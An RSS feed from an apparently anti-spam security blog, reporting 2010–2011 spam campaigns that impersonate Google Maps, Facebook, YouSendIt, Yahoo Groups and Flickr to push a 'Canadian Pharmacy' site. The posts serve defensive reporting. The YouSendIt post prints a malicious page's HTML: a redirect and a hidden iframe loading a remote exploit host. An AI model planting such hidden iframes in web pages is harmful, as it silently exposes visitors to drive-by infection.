<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>mxlab - all about anti virus and anti spam &#187; canadian pharmacy</title>
	<atom:link href="http://blog.mxlab.eu/tag/canadian-pharmacy/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.mxlab.eu</link>
	<description>mx lab blog - all about anti virus and anti spam</description>
	<lastBuildDate>Mon, 13 Feb 2012 23:20:55 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='blog.mxlab.eu' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>mxlab - all about anti virus and anti spam &#187; canadian pharmacy</title>
		<link>http://blog.mxlab.eu</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://blog.mxlab.eu/osd.xml" title="mxlab - all about anti virus and anti spam" />
	<atom:link rel='hub' href='http://blog.mxlab.eu/?pushpress=hub'/>
		<item>
		<title>Emails &#8220;Sent via Google Maps&#8221; is a redirect to the Canadian Pharmacy</title>
		<link>http://blog.mxlab.eu/2011/09/26/emails-sent-via-google-maps-is-a-redirect-to-the-canadian-pharmacy/</link>
		<comments>http://blog.mxlab.eu/2011/09/26/emails-sent-via-google-maps-is-a-redirect-to-the-canadian-pharmacy/#comments</comments>
		<pubDate>Mon, 26 Sep 2011 09:27:32 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[canadian pharmacy]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1447</guid>
		<description><![CDATA[MX Lab, http://www.mxlab.eu, intercepted some spam messages with subjects like: Sent via Google Maps: Brett Lepper sent you: A Maps link Sent via Google Maps: Brenna Eber sent you: A Maps link Sent via Google Maps: Theodora Cavitt sent you: A Maps link &#8230; The subjects start with &#8216;Sent via Google Maps:&#8217; and end with [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1447&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab, <a href="http://www.mxlab.eu" target="_blank">http://www.mxlab.eu</a>, intercepted some spam messages with subjects like:</p>
<p>Sent via Google Maps: Brett Lepper sent you: A Maps link<br />
Sent via Google Maps: Brenna Eber sent you: A Maps link<br />
Sent via Google Maps: Theodora Cavitt sent you: A Maps link<br />
&#8230;</p>
<p>The subjects start with &#8216;Sent via Google Maps:&#8217; and end with &#8216;A Maps link&#8217;.<br />
The from email address is spoofed but starts with &#8216;admin@&#8217; combined with a subdomain address.</p>
<p>Message body examples:</p>
<blockquote>
<div>
<div lang="x-western">
<div>This email was sent to you by a user on Google Maps:</div>
<div>Hi</div>
<hr noshade="noshade" size="1" />
<div>hxxp://gertie8kthv.blogginc.asia/10/8/gertie-bawa.html</div>
</div>
</div>
</blockquote>
<div lang="x-western">
<blockquote>
<div>This email was sent to you by a user on Google Maps:</div>
<div>Hi</div>
<hr noshade="noshade" size="1" />
<div>hxxp://elmira4221c.blogsun.asia/11/10/elmira-antoniuk.html</div>
</blockquote>
</div>
<p>The URLs in the message will redirect the user to the website of the Canadian Pharmacy at hxxp://www.bestrxs.com/.</p>
<p><img class="alignnone" src="http://img.blog.mxlab.eu/2011/20110323_canpharmacy.gif" alt="" width="450" height="346" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1447/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1447/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1447/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1447/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1447/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1447/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1447/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1447/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1447/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1447/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1447/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1447/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1447/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1447/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1447&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2011/09/26/emails-sent-via-google-maps-is-a-redirect-to-the-canadian-pharmacy/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://img.blog.mxlab.eu/2011/20110323_canpharmacy.gif" medium="image" />
	</item>
		<item>
		<title>Canadian Pharmacy pops up in emails from Facebook with subject &#8220;Welcome to Facebook Goods&#8221;</title>
		<link>http://blog.mxlab.eu/2011/04/03/canadian-pharmacy-pops-up-in-emails-from-facebook-with-subject-welcome-to-facebook-goods/</link>
		<comments>http://blog.mxlab.eu/2011/04/03/canadian-pharmacy-pops-up-in-emails-from-facebook-with-subject-welcome-to-facebook-goods/#comments</comments>
		<pubDate>Sun, 03 Apr 2011 10:06:47 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[canadian pharmacy]]></category>
		<category><![CDATA[facebook spam]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1355</guid>
		<description><![CDATA[MX Lab, http://www.mxlab.eu, started to intercept a new spam campaign, since yesterday, by email with the subject &#8220;Welcome to Facebook Goods&#8221;. These messages are sent from the spoofed email addresses in the format that Facebook is using on the domain facebookmail.com. Some examples: update+bscts2qxhedj@facebookmail.com update+6i8mlfxn1svw@facebookmail.com update+6i8mlfxn1svw@facebookmail.com &#8230; This is the body of the email: Notice [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1355&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab, <a href="http://www.mxlab.eu/" target="_blank">http://www.mxlab.eu</a>, started to intercept a new spam campaign, since yesterday, by email with the subject &#8220;Welcome to Facebook Goods&#8221;. These messages are sent from the spoofed email addresses in the format that Facebook is using on the domain facebookmail.com. Some examples:</p>
<p>update+bscts2qxhedj@facebookmail.com<br />
update+6i8mlfxn1svw@facebookmail.com<br />
update+6i8mlfxn1svw@facebookmail.com<br />
&#8230;</p>
<p>This is the body of the email:</p>
<p><img class="alignnone" src="http://img.blog.mxlab.eu/2011/20110403_Facebook_CanPharm.jpg" alt="" width="450" height="363" /></p>
<p>Notice that the Facebook looks are used to disguise the real purpose of the message.</p>
<p>4 different URLs are used in each message with the format: http://www.domainhere.tld/s/h/o/p/ that will redirect you to the Canadian Pharmacy at hxxp://midiclxic.ru/.</p>
<p>&nbsp;</p>
<p><img class="alignnone" src="http://img.blog.mxlab.eu/2011/20110323_canpharmacy.gif" alt="" width="450" height="346" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1355/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1355/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1355/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1355/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1355/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1355/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1355/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1355/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1355/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1355/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1355/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1355/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1355/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1355/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1355&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2011/04/03/canadian-pharmacy-pops-up-in-emails-from-facebook-with-subject-welcome-to-facebook-goods/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://img.blog.mxlab.eu/2011/20110403_Facebook_CanPharm.jpg" medium="image" />

		<media:content url="http://img.blog.mxlab.eu/2011/20110323_canpharmacy.gif" medium="image" />
	</item>
		<item>
		<title>Spam from Canadian pharmacy masked as &#8220;Delivery Notification&#8221;</title>
		<link>http://blog.mxlab.eu/2011/03/23/spam-from-canadian-pharmacy-masked-as-delivery-notification/</link>
		<comments>http://blog.mxlab.eu/2011/03/23/spam-from-canadian-pharmacy-masked-as-delivery-notification/#comments</comments>
		<pubDate>Wed, 23 Mar 2011 18:49:05 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[canadian pharmacy]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1299</guid>
		<description><![CDATA[MX Lab, http://www.mxlab.eu, started to intercept a new spam campaign by email with the subject &#8221;Delivery Notification&#8221;. What appears at first as a simple email notification is in fact a spam campaign for the Canadian Pharmacy. The message is sent from a spoofed email addresses like: Notification-15955 &#60;lwnfc@vowyg2kynvx4.veridomlegal.net&#62; Notification-07997 &#60;cwujg@fgoorlgaxle7.veridomlegal.net&#62; &#8230; The body of the email [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1299&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab, <a href="http://www.mxlab.eu" target="_blank">http://www.mxlab.eu</a>, started to intercept a new spam campaign by email with the subject &#8221;Delivery Notification&#8221;. What appears at first as a simple email notification is in fact a spam campaign for the Canadian Pharmacy.</p>
<p>The message is sent from a spoofed email addresses like:</p>
<blockquote><p>Notification-15955 &lt;lwnfc@vowyg2kynvx4.veridomlegal.net&gt;<br />
Notification-07997 &lt;cwujg@fgoorlgaxle7.veridomlegal.net&gt;<br />
&#8230;</p></blockquote>
<p>The body of the email only contains a link to a web site:</p>
<blockquote><p>http://www-48023.outdomnovolume.net</p>
<p>http://www-35051.outdomnovolume.net</p>
<p>&#8230;.</p></blockquote>
<p>The 5 numbers inside the web site address change with every email but always shows the web site of the Canadian Pharmacy:</p>
<p><img class="alignnone" src="http://img.blog.mxlab.eu/2011/20110323_canpharmacy.gif" alt="" width="450" height="346" /></p>
<p>The domain outdomnovolume.net is registered a few days ago according to a WHOIS is with the following details:</p>
<pre>Domain name: outdomnovolume.net

Registrant Contact:
   Xicheng
   Zhongguancun Si Zhongguancun@yahoo.com
   01066569226 fax: 01066569226
   Huixindongjie
   Beijing Chaoyang 101400
   cn

Administrative Contact:
   Zhongguancun Si Zhongguancun@yahoo.com
   01066569226 fax: 01066569226
   Huixindongjie
   Beijing Chaoyang 101400
   cn

Technical Contact:
   Zhongguancun Si Zhongguancun@yahoo.com
   01066569226 fax: 01066569226
   Huixindongjie
   Beijing Chaoyang 101400
   cn

Billing Contact:
   Zhongguancun Si Zhongguancun@yahoo.com
   01066569226 fax: 01066569226
   Huixindongjie
   Beijing Chaoyang 101400
   cn

DNS:
ns1.dnsfopiq.com
ns2.dnstow.ru

Created: 2011-03-19
Expires: 2012-03-19</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1299/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1299/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1299/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1299/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1299/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1299/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1299/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1299/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1299/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1299/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1299/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1299/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1299/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1299/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1299&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2011/03/23/spam-from-canadian-pharmacy-masked-as-delivery-notification/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://img.blog.mxlab.eu/2011/20110323_canpharmacy.gif" medium="image" />
	</item>
		<item>
		<title>Spam message inside a ZIP file</title>
		<link>http://blog.mxlab.eu/2010/08/25/spam-message-inside-a-zip-file/</link>
		<comments>http://blog.mxlab.eu/2010/08/25/spam-message-inside-a-zip-file/#comments</comments>
		<pubDate>Wed, 25 Aug 2010 14:37:32 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[canadian pharmacy]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1058</guid>
		<description><![CDATA[Spammer often use new techniques in order to deliver the message to the recipient without being catched by email security solutions. Today, one of such spam emails did caught our attention because of the original technique that has been used. The spam email had the subject &#8220;Your wife photos attached&#8221;, a very short body content [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1058&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Spammer often use new techniques in order to deliver the message to the recipient without being catched by email security solutions. Today, one of such spam emails did caught our attention because of the original technique that has been used.</p>
<p>The spam email had the subject &#8220;Your wife photos attached&#8221;, a very short body content &#8221; Your wife photos&#8221; and the attached file rooster.zip.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100825_rooster_2.jpg" alt="" width="450" height="125" /></p>
<p>At first, we thought this was some new email security treath so we investigated the ZIP archive. Once extracted the file rooster.jpg was available. The filename does not end with .exe or the combination of many spaces with at the end .exe so we opened the JPEG and got this spam advertisment for Viagra, Cialis and VPXL.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100825_rooster.jpg" alt="" width="335" height="320" /></p>
<p>The instructions, if you are interested, is to go to med242.ru which leads to the web site of the Canadian Pharmacy.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" alt="" width="450" height="418" /></p>
<p>I can understand that spammers try different techniques but this one is, in my humble opinion, not a very good one. What a hassle to read the message.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1058/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1058&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/25/spam-message-inside-a-zip-file/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100825_rooster_2.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100825_rooster.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" medium="image" />
	</item>
		<item>
		<title>Yahoo Groups being abused by spammers</title>
		<link>http://blog.mxlab.eu/2010/08/06/yahoo-groups-being-abused-by-spammers/</link>
		<comments>http://blog.mxlab.eu/2010/08/06/yahoo-groups-being-abused-by-spammers/#comments</comments>
		<pubDate>Fri, 06 Aug 2010 00:41:35 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[canadian pharmacy]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1006</guid>
		<description><![CDATA[Great names are quite often the subject of abuses and this time, the  Yahoo Groups are being used in spam messages. Spammers have created a large amount of account on the Yahoo Groups and are including URLs in their spam messages. The messages comes with the subject line in the form of: ****@***.be VIAGRA ® [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1006&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Great names are quite often the subject of abuses and this time, the  Yahoo Groups are being used in spam messages. Spammers have created a large amount of account on the Yahoo Groups and are including URLs in their spam messages.</p>
<p>The messages comes with the subject line in the form of: ****@***.be VIAGRA ® Official Site -77%. The body of the email only contains an URL to for example hxxp://groups.yahoo.com/group/*****/message.</p>
<p>This is an example of such a web site.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100806_yahoogropusspam.gif" alt="" width="450" height="313" /></p>
<p>The image that promotes Viagra also contains an URL that leads to, in our case, hxxp://superdrugsudden.com:8080/. And yes, it&#8217;s the Canadian Pharmacy again. We have to admit that they are very active on the internet.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" alt="" width="450" height="418" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1006/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1006/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1006/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1006/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1006/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1006/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1006/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1006/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1006/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1006/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1006/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1006/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1006/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1006/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=1006&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/06/yahoo-groups-being-abused-by-spammers/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100806_yahoogropusspam.gif" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" medium="image" />
	</item>
		<item>
		<title>YouSendIt abused in a malware and spam distribution</title>
		<link>http://blog.mxlab.eu/2010/08/05/yosendit-abused-in-a-malware-and-spam-distribution/</link>
		<comments>http://blog.mxlab.eu/2010/08/05/yosendit-abused-in-a-malware-and-spam-distribution/#comments</comments>
		<pubDate>Thu, 05 Aug 2010 16:32:50 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[canadian pharmacy]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=995</guid>
		<description><![CDATA[MX Lab intercepted a emails with the subject &#8220;You have received a file from aleppotz@rockypointinc.com via YouSendIt.&#8221; that contains a potential risk of a malicious payload and redirects you to a Canadian Pharmacy web site. The email address in the subject line can be different depending on the spoofed senders address. The message indicates that [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=995&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a emails with the subject &#8220;You have received a file from aleppotz@rockypointinc.com via YouSendIt.&#8221; that contains a potential risk of a malicious payload and redirects you to a Canadian Pharmacy web site. The email address in the subject line can be different depending on the spoofed senders address.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100805_malware_sendit.gif" alt="" width="673" height="392" /></p>
<p>The message indicates that you have a file, in this case an audio file in MP4 format, for you to download at YouSendIt, the well known online file sharing and distribution web site.</p>
<p>The URLs in the message however, do not point to the YouSendIt web site but will lead to hxxp://carlaustiniii.org/x.html. When following this URL on our Mac we got the message &#8220;PLEASE WAITING 4 SECOND&#8230;&#8221;.</p>
<p>The web site has the following HTML code:</p>
<pre>PLEASE WAITING 4 SECOND...
  &lt;meta http-equiv="refresh" content="4;url=hxxp://spruceteam.com"&gt;
&lt;/head&gt;&lt;body&gt;

&lt;iframe src="hxxp://tartonion.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"&gt;&lt;/iframe&gt;
&lt;/body&gt;&lt;/html&gt;</pre>
<p>We believe that at this stage that these messages have a malicious payload that could infect your computer. Afterwards we got redirected to hxxp://spruceteam.com/, the famous Canadian Pharmacy web site.</p>
<p>MX Lab has detected an increase in combined strategies during the last few weeks and months where emails leads to a web site with malicious code and exploits and then forward the user to a spam web site in the hope that the end user will not note that his computer is also infected with a trojan.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/995/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/995/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/995/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/995/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/995/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/995/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/995/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/995/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/995/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/995/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/995/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/995/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/995/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/995/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=995&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/05/yosendit-abused-in-a-malware-and-spam-distribution/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100805_malware_sendit.gif" medium="image" />
	</item>
		<item>
		<title>Flickr welcome message leads to Canadian Pharmacy web site</title>
		<link>http://blog.mxlab.eu/2010/07/06/flickr-welcome-message-leads-to-canadian-pharmacy-web-site/</link>
		<comments>http://blog.mxlab.eu/2010/07/06/flickr-welcome-message-leads-to-canadian-pharmacy-web-site/#comments</comments>
		<pubDate>Tue, 06 Jul 2010 16:06:13 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[Canadian Neighbor Pharmacy]]></category>
		<category><![CDATA[canadian pharmacy]]></category>
		<category><![CDATA[Flickr]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=947</guid>
		<description><![CDATA[Various brands have been subject to spam campaigns and today Flickr, the photo sharing web site, is now also being abused by spammers. MX Lab started to intercept messages with the subject &#8220;[Flickr] Welcome!&#8221;, send from a spoofed email address, with an welcome message  from Flickr (see image below). Every link in the message leads [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=947&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
